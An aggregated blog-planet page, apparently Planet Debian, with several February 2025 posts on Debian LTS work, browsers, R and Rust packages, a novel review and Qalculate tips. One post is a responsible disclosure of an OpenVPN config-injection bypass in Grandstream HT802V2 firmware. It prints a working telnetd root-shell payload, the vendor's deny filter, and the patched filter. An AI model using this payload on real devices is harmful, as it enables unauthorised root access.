Search Results: "abi"

14 February 2025

Freexian Collaborators: Monthly report about Debian Long Term Support, January 2025 (by Roberto C. S nchez)

Like each month, have a look at the work funded by Freexian s Debian LTS offering.

Debian LTS contributors In January, 20 contributors have been paid to work on Debian LTS, their reports are available:
  • Abhijith PA did 8.0h (out of 14.0h assigned), thus carrying over 6.0h to the next month.
  • Adrian Bunk did 36.5h (out of 47.75h assigned and 52.25h from previous period), thus carrying over 63.5h to the next month.
  • Andrej Shadura did 11.0h (out of 11.0h assigned and 4.0h from previous period), thus carrying over 4.0h to the next month.
  • Arturo Borrero Gonzalez did 9.0h (out of 10.0h assigned), thus carrying over 1.0h to the next month.
  • Bastien Roucari s did 22.0h (out of 22.0h assigned).
  • Ben Hutchings did 8.0h (out of 21.0h assigned and 3.0h from previous period), thus carrying over 16.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 20.0h (out of 23.0h assigned and 3.0h from previous period), thus carrying over 6.0h to the next month.
  • Emilio Pozuelo Monfort did 34.0h (out of 7.0h assigned and 27.75h from previous period), thus carrying over 0.75h to the next month.
  • Guilhem Moulin did 3.25h (out of 20.0h assigned), thus carrying over 16.75h to the next month.
  • Jochen Sprickerhof did 23.0h (out of 15.0h assigned and 8.0h from previous period).
  • Lee Garrett did 15.75h (out of 8.5h assigned and 51.5h from previous period), thus carrying over 44.25h to the next month.
  • Lucas Kanashiro did 8.0h (out of 32.0h assigned and 32.0h from previous period), thus carrying over 56.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. S nchez did 14.75h (out of 13.5h assigned and 10.5h from previous period), thus carrying over 9.25h to the next month.
  • Santiago Ruano Rinc n did 21.75h (out of 18.75h assigned and 6.25h from previous period), thus carrying over 3.25h to the next month.
  • Sean Whitton did 8.5h (out of 8.5h assigned).
  • Sylvain Beucler did 10.5h (out of 0.0h assigned and 49.5h from previous period), thus carrying over 39.0h to the next month.
  • Thorsten Alteholz did 11.0h (out of 11.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).

Evolution of the situation In January, we have released 33 DLAs. There were numerous security and non-security updates to Debian 11 (codename bullseye ) during January.
  • Notable security updates:
    • rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
    • tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
    • ruby2.7, prepared by Bastien Roucari s, fixed several CVEs (including denial of service vulnerabilities)
    • tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL ptr, buffer overflow, use-after-free, and segfault vulnerabilities)
  • Notable non-security updates:
    • linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the bullseye-backports suite)
    • debian-security-support, prepared by Santiago Ruano Rinc n, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk
In addition to the security and non-security updates targeting bullseye , various LTS contributors have prepared uploads targeting Debian 12 (codename bookworm ) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucari s prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rinc n also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago s work on identifying and tracking similar issues, underscore the LTS Team s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release. LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rinc n prepared an upload of openjpeg2 for Debian unstable (codename sid ), as part of the LTS Team effort to assist with package uploads to unstable.

Thanks to our sponsors Sponsors that joined recently are in bold.

13 February 2025

Russell Coker: Browser Choice

Browser Choice and Security Support Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn t an option and Chromium still has some of the Google anti-features built in. Firefox So I tried to use Firefox for the things I do. One feature of Chrome based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can t set a file for the URL, so I could set a web server for it but it s annoying to have to setup a web server to work around a browser limitation. Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There s a Firefox setting for allowing web sites to autoplay but there doesn t seem to be a way to add sites to the list. Firefox is getting vertical tabs which is a really nice feature for wide displays [3]. Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can t develop software that can be deployed without Docker then you aren t developing it well. Chromium The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it s not included in Debian. Some of the changes like replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk are things that could be considered controversial. It definitely isn t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser. What Next? The Falcon browser that is part of the KDE project looks good, but QtWebEngine doesn t have security support in Debian. Would it be possible to provide security support for it? Ungoogled Chromium is available in Flatpak, so I ll test that out. But ideally it would be packaged for Debian. I ll try building a package of it and see how that goes. The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.

12 February 2025

Dirk Eddelbuettel: RcppUUID 1.2.0 on CRAN: Adding Clock-based UUIDs

The RcppUUID package on CRAN has been providing UUIDs (based on the underlying Boost library) for several years. Written by Artem Klemsov and maintained in this gitlab repo, the package is a very nice example of clean and straightforward library binding. As it had dropped off CRAN over a relatively minor issue, I descided to adopted it with the previous 1.1.2 release made quite recently. This release adds new high-resolution clock-based UUIDs accordingt to the v7 spec. Internally 100ns increments are represented. The resulting UUIDs are both unique and sortable. I added this recent example to the README.md which illustrated both the implicit ordering and uniqueness. The unit tests check this with a much larger N.
> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>
While one can revert from the UUID object to the clock object, I am not aware of a text parser so there is currently no inverse function (as ulid offers) for the character representation. The NEWS entry for the two releases follows.

Changes in version 1.2.0 (2025-02-12)
  • Time-based UUIDs, ie version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)
  • New maintainer to resurrect package on CRAN

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

11 February 2025

Ian Jackson: derive-deftly 1.0.0 - Rust derive macros, the easy way

derive-deftly 1.0 is released. derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too! Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros. Programmers coming to Rust from scripting languages will appreciate derive-deftly s convenient automatic code generation, which works as a kind of compile-time introspection. Rust s two main macro systems I m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness. Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use. (Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.) macro_rules! macro_rules! aka pattern macros , declarative macros , or sometimes macros by example are the simpler kind of Rust macro. They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward: macro_rules! s pattern language doesn t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there s a horrible technique as a workaround.) And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! . This makes it hard to apply more than one macro to the same struct, and produces rightward drift. Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside. macro_rules also has various other weird deficiencies too specific to list here. Overall, compared to (say) the C preprocessor, it s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated. proc macros Rust s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro s implementation is Rust code, which takes the macro s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program. This approach is more similar to Common Lisp s macros than to most other programming languages macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc. This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum. But, it is a complete pain in the backside to write and maintain a proc_macro. The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code. There are build/execution environment problems. The proc_macro code can t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust. derive-deftly to the rescue derive-deftly lets you use a write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff. Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure. Example Here s a real-world example from a personal project:
define_derive_deftly!  
    export UpdateWorkerReport:
    impl $ttype  
        pub fn update_worker_report(&self, wr: &mut WorkerReport)  
            $(
                $ when fmeta(worker_report) 
                wr.$fname = Some(self.$fname.clone()).into();
            )
         
     
 
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow  
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
 
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
    pub fn update_worker_report(&self, wr: &mut WorkerReport)  
        wr.status = Some(self.status.clone()).into();
        wr.info = Some(self.status.clone()).into();
     
Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible. Special-purpose derive macros are now worthwhile! Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros. The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly. Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.) In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros. derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro. Stability without stagnation derive-deftly is already highly capable, and can solve many advanced problems. It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide. But declaring it 1.0 doesn t mean that it won t improve further. Our ticket tracker has a laundry list of possible features. We ll sometimes be cautious about committing to these, so we ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.

comment count unavailable comments

Freexian Collaborators: Debian Contributions: Python 3.13 as the default Python 3 version, Fixing qtpaths6 for cross compilation, sbuild support for Salsa CI, Rails 7 transition, DebConf preparations and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-01 Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson The Python 3.13 as default transition has now completed. The next step is to remove Python 3.12 from the archive, which should be very straightforward, it just requires rebuilding C extension packages in no particular order. Stefano fixed some miscellaneous bugs blocking the completion of the 3.13 as default transition.

Fixing qtpaths6 for cross compilation, by Helmut Grohne While Qt5 used to use qmake to query installation properties, Qt6 is moving more and more to CMake and to ease that transition it relies on more qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knau in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable ready in time for the trixie release.

/usr-move, by Helmut Grohne In December, Emil S dergren reported that a live-build was not working for him and in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were to be attributed to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already and all instances have received updated patches. Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.

rebootstrap, by Helmut Grohne As much as we think of our base system as stable, it is changing a lot and the architecture cross bootstrap tooling is very sensitive to such changes requiring permanent maintenance. A problem that recently surfaced was that building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign resolving the initial problem.

Salsa CI, by Santiago Ruano Rinc n Santiago continued the work about the sbuild support for Salsa CI, that was mentioned in the previous month report. The !568 merge request that created the new build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569, and some issues were spotted, and part of them fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233. One of the last improvements relates to how to enable projects to customize the pipeline, in an equivalent way than they currently do in the extract-source and build jobs. While this is work-in-progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as they are done in the official debian buildd.

DebConf preparations, by Stefano Rivera and Santiago Ruano Rinc n DebConf will be happening in Brest, France, in July. Santiago continued the DebConf 25 organization work, looking for catering providers. Both Stefano and Santiago have been reaching out to some potential sponsors. DebConf depends on sponsors to cover the organization cost, if your company depends on Debian, please consider sponsoring DebConf. Stefano has been winding up some of the finances from previous DebConfs. Finalizing reimbursements to team members from DebConf 23, and handling some outstanding issues from DebConf 24. Stefano and the rest of the DebConf committee have been reviewing bids for DebConf 26, to select the next venue.

Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs were fixed by Lucas and the Debian Ruby team during the sprint hold in Paris during Jan 27-31. The next step is to remove support of Ruby 3.1, which is the alternative Ruby interpreter for now. Thanks to the Debian Release team for all the support, especially Emilio Pozuelo Monfort.

Rails 7 transition, by Lucas Kanashiro Rails 6 has been shipped by Debian since Bullseye, and as a WEB framework, many issues (especially security related issues) have been encountered and the maintainability of it becomes harder and harder. With that in mind, during the Debian Ruby team sprint last month, the transition to Rack 3 (an important dependency of rails containing many breaking changes) was started in Debian unstable, it is ongoing. Once it is done, the Rails 7 transition will take place, and Rails 7 should be shipped in Debian Trixie.

Miscellaneous contributions
  • Stefano improved a poor ImportError for users of the turtle module on Python 3, who haven t installed the python3-tk package.
  • Stefano updated several packages to new upstream releases.
  • Stefano added the Python extension to the re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
  • Stefano started provisioning a new physical server for the debian.social infrastructure.
  • Carles improved simplemonitor (documentation on systemd integration, worked with upstream for fixing a bug).
  • Carles upgraded packages to new upstream versions: python-ring-doorbell and python-asyncclick.
  • Carles did po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
  • Carles maintained po-debconf-manager with small fixes.
  • Rapha l worked on some outstanding DEP-14 merge request and participated in the associated discussion. The discussions have been more contentious than anticipated, somewhat exacerbated by Otto s desire to conclude fast while the required tool support is not yet there.
  • Rapha l, with the help of Philipp Kern from the DSA team, upgraded tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn enabled him to configure authentication via salsa.debian.org. It s now possible to login to tracker.debian.org with your salsa credentials!
  • Rapha l updated zim a nice desktop wiki that is very handy to organize your day-to-day digital life to the latest upstream version (0.76).
  • Helmut sent patches for 10 cross build failures.
  • Helmut continued working on a tool for memory-based concurrency limit of builds.
  • Helmut NMUed libtool, opensysusers and virtualbox.
  • Enrico tried to support Helmut in working out tricky usrmerge situations
  • Thorsten Alteholz uploaded a new upstream version of brlaser.
  • Colin Watson upgraded 33 Python packages to new upstream versions, including fixes for CVE-2024-42353, CVE-2024-47532, and CVE-2025-22153.
  • Emilio Pozuelo managed various transitions, and fixed various RC bugs (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).
  • Anupa attended the monthly team meeting for Debian publicity team and shared the social media stats.
  • Anupa assisted Jean-Pierre Giraud in the point release announcement for Debian 12.9 and published the Micronews.
  • Anupa took part in multiple Debian publicity team discussions regarding our presence in social media platforms.

10 February 2025

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

9 February 2025

Antoine Beaupr : Qalculate hacks

This is going to be a controversial statement because some people are absolute nerds about this, but, I need to say it. Qalculate is the best calculator that has ever been made. I am not going to try to convince you of this, I just wanted to put out my bias out there before writing down those notes. I am a total fan. This page will collect my notes of cool hacks I do with Qalculate. Most examples are copy-pasted from the command-line interface (qalc(1)), but I typically use the graphical interface as it's slightly better at displaying complex formulas. Discoverability is obviously also better for the cornucopia of features this fantastic application ships.

Qalc commandline primer On Debian, Qalculate's CLI interface can be installed with:
apt install qalc
Then you start it with the qalc command, and end up on a prompt:
anarcat@angela:~$ qalc
> 
Then it's a normal calculator:
anarcat@angela:~$ qalc
> 1+1
  1 + 1 = 2
> 1/7
  1 / 7   0.1429
> pi
  pi   3.142
> 
There's a bunch of variables to control display, approximation, and so on:
> set precision 6
> 1/7
  1 / 7   0.142857
> set precision 20
> pi
  pi   3.1415926535897932385
When I need more, I typically browse around the menus. One big issue I have with Qalculate is there are a lot of menus and features. I had to fiddle quite a bit to figure out that set precision command above. I might add more examples here as I find them.

Bandwidth estimates I often use the data units to estimate bandwidths. For example, here's what 1 megabit per second is over a month ("about 300 GiB"):
> 1 megabit/s * 30 day to gibibyte 
  (1 megabit/second)   (30 days)   301.7 GiB
Or, "how long will it take to download X", in this case, 1GiB over a 100 mbps link:
> 1GiB/(100 megabit/s)
  (1 gibibyte) / (100 megabits/second)   1 min + 25.90 s

Password entropy To calculate how much entropy (in bits) a given password structure, you count the number of possibilities in each entry (say, [a-z] is 26 possibilities, "one word in a 8k dictionary" is 8000), extract the base-2 logarithm, multiplied by the number of entries. For example, an alphabetic 14-character password is:
> log2(26*2)*14
  log (26   2)   14   79.81
... 80 bits of entropy. To get the equivalent in a Diceware password with a 8000 word dictionary, you would need:
> log2(8k)*x = 80
  (log (8   000)   x) = 80  
  x   6.170
... about 6 words, which gives you:
> log2(8k)*6
  log (8   1000)   6   77.79
78 bits of entropy.

Exchange rates You can convert between currencies!
> 1 EUR to USD
  1 EUR   1.038 USD
Even fake ones!
> 1 BTC to USD
  1 BTC   96712 USD
This relies on a database pulled form the internet (typically the central european bank rates, see the source). It will prompt you if it's too old:
It has been 256 days since the exchange rates last were updated.
Do you wish to update the exchange rates now? y
As a reader pointed out, you can set the refresh rate for currencies, as some countries will require way more frequent exchange rates. The graphical version has a little graphical indicator that, when you mouse over, tells you where the rate comes from.

Other conversions Here are other neat conversions extracted from my history
> teaspoon to ml
  teaspoon = 5 mL
> tablespoon to ml
  tablespoon = 15 mL
> 1 cup to ml 
  1 cup   236.6 mL
> 6 L/100km to mpg
  (6 liters) / (100 kilometers)   39.20 mpg
> 100 kph to mph
  100 kph   62.14 mph
> (108km - 72km) / 110km/h
  ((108 kilometers)   (72 kilometers)) / (110 kilometers/hour)  
  19 min + 38.18 s

Completion time estimates This is a more involved example I often do.

